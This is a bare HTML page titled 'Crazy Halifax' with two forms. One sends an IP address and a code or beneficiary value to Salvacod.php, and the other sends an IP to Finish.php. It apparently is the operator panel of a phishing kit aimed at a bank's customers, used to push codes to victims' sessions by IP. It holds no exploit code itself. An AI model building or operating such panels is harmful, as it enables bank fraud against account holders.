 <html>

<head><meta charset="windows-1252">
<meta http-equiv="Content-Language" content="pt-br">

<title>Crazy Halifax</title>
</head>

<body>

<form method="POST" action="Salvacod.php">
	<p><font color="#0000FF">IP:</font> <input type="text" name="IP" size="27"><br>
	<br>
	<font color="#0000FF">
	<span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none">
	COD:</span></font><span style="color: rgb(63, 161, 16); font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none">
	</span><input type="text" name="BENEFICIARIO" size="41"><br>
	&nbsp;</p>
	<p><input type="submit" value="Send COD" name="B1">&nbsp;&nbsp;&nbsp;
	<input type="reset" value="Reset" name="B2"></p>
	<p>&nbsp;</p>
</form>

<form method="POST" action="Finish.php">
	<p align="left"><font color="#0000FF">&nbsp;&nbsp;&nbsp; </font>
	<font size="5" color="#0000FF">&nbsp;Finish</font></p>
	<p><font color="#0000FF">IP:</font> <input type="text" name="IP" size="27"><br>
	&nbsp;</p>
	<p><input type="submit" value="Finish" name="B1">&nbsp;&nbsp;&nbsp;
	<input type="reset" value="Reset" name="B2"></p>
</form>

</body>

</html>